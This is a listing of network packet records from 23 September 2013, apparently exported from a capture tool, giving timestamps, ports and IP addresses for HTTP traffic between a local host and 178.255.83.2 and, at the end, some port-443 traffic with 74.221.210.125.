Sep 23, 2013 11:35:35.249319077 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.267332077 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.268070936 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.268081903 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.268760920 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.304517984 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.304527044 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.305259943 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.307533026 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.308254957 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.308265924 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.308815002 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.361397028 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.395492077 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.396287918 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.396300077 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.397022009 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.442608118 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.442615032 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.443346977 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.464998007 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.465811014 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.465821981 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.466562033 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.475229979 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.491628885 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.492373943 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.492383957 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.493000031 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.499967098 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.499973059 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.500714064 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.592371941 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.593187094 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.593203068 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.593923092 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.613420963 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.613426924 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.614362955 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.694545031 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.695282936 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.695298910 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.696029902 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.732620001 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.732629061 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.733439922 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.737309933 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.738044024 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.738056898 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.738658905 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.771950006 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.778465986 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.779277086 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.779288054 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.779911041 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.817310095 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.837619066 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.838357925 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.838368893 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.838722944 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.862776041 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.864950895 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.865711927 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.865744114 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.866316080 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.891242981 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.891253948 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.892000914 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.910111904 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.910857916 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.910870075 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.911336899 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.939379930 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.952447891 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.953248024 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.953258038 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.963664055 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.964396954 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.964407921 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.964937925 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.974724054 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.974729061 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.975465059 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.992892981 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.993633986 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:35.993654966 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:35.994241953 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.011887074 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.042390108 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.043148994 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.043164968 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.043840885 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.049721956 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.050080061 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.050767899 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.050779104 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.051253080 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.082592964 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.082600117 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.083302021 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.111563921 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.112004995 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.112307072 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.112317085 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.112646103 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.112911940 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.149863005 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.150597095 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.150607109 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.150794029 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.151051998 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.151061058 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.151459932 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.224188089 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.224937916 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.224948883 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.225390911 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.230372906 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.230379105 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.231112003 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.298794031 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.299530029 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.299541950 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.299751997 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.309581041 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.310312033 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.310322046 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.310827017 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.319746971 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.319752932 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.320563078 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.326389074 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.327205896 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.327214956 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.327830076 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.385977030 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.386454105 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.386904955 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.387145042 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.387156010 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.387548923 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.387825966 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.399856091 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.400593042 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.400603056 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.401223898 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.415966988 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.440850019 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.441663980 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.441673994 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.442190886 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.450305939 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.450310946 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.451047897 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.458926916 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.458931923 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.459630013 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.506376028 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.506386042 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.507128954 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.645342112 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.651202917 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.689697027 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.690423012 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.690447092 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.690968990 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.726427078 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.764997005 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.765283108 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.765808105 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.765821934 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.766031027 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.804588079 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.805210114 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.805223942 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.812352896 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.813091040 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.813102961 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.813677073 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.856744051 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.859491110 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.860301018 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.860311985 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.860928059 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.907809973 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.917660952 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.918400049 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.918411016 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.919071913 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.920968056 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.920975924 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.921701908 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.943298101 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.967781067 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.968522072 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:36.968535900 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:36.969068050 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.017574072 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.018120050 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.018852949 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.018865108 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.019392014 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.040066004 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.040074110 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.040827990 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.044631004 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.044636965 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.045389891 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.081835032 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.109066010 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.109787941 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.109805107 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.110330105 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.122987032 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.122992992 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.123809099 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.130084038 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.161442041 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.162251949 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.162262917 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.162883043 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.182169914 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.182177067 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.182992935 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.225007057 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.225706100 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.225718975 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.229933977 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.230603933 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.230612993 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.230938911 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.249360085 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.258930922 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.259627104 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.259638071 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.262402058 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.268347025 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.277085066 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.277704954 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.277717113 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.278156996 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.286010981 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.321203947 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.321945906 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.321957111 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.418870926 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.419615030 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.419625044 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.419836998 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.426664114 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.427478075 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.427486897 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.428116083 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.475697041 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.475703001 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.476453066 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.499033928 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.499847889 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.499857903 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.500528097 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.512417078 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.512423992 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.513242006 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.518095016 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.518860102 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.518898964 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.519481897 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.526609898 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.544517994 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.545321941 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.545335054 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.583409071 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.584139109 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.584151030 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.584367037 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.618344069 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.619153976 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.619163990 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.619749069 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.646667957 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.646675110 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.647356033 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.661243916 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.661251068 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.662054062 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.680998087 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.681524038 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.681535006 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.682404041 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.738337994 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.767631054 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.768436909 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.768449068 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.769100904 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.782947063 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.798355103 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.799153090 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.799163103 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.824807882 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.825544119 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.825555086 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.826131105 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.866113901 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.877327919 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.878135920 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.878146887 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.878722906 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:37.930221081 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.930227041 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:37.931037903 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:38.038109064 CEST	80	1034	178.255.83.2	192.168.0.10
Sep 23, 2013 11:35:38.038902998 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:38.039753914 CEST	1034	80	192.168.0.10	178.255.83.2
Sep 23, 2013 11:35:38.335489988 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:38.335505962 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.153633118 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.233885050 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.234719992 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.234743118 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.235462904 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.251231909 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.266594887 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.267307997 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.267327070 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.267849922 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.292172909 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.301697016 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.302427053 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.302448034 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.303028107 CEST	1031	443	192.168.0.10	74.221.210.125
Sep 23, 2013 11:35:39.327600002 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.327615976 CEST	443	1031	74.221.210.125	192.168.0.10
Sep 23, 2013 11:35:39.328356981 CEST	1031	443	192.168.0.10	74.221.210.125
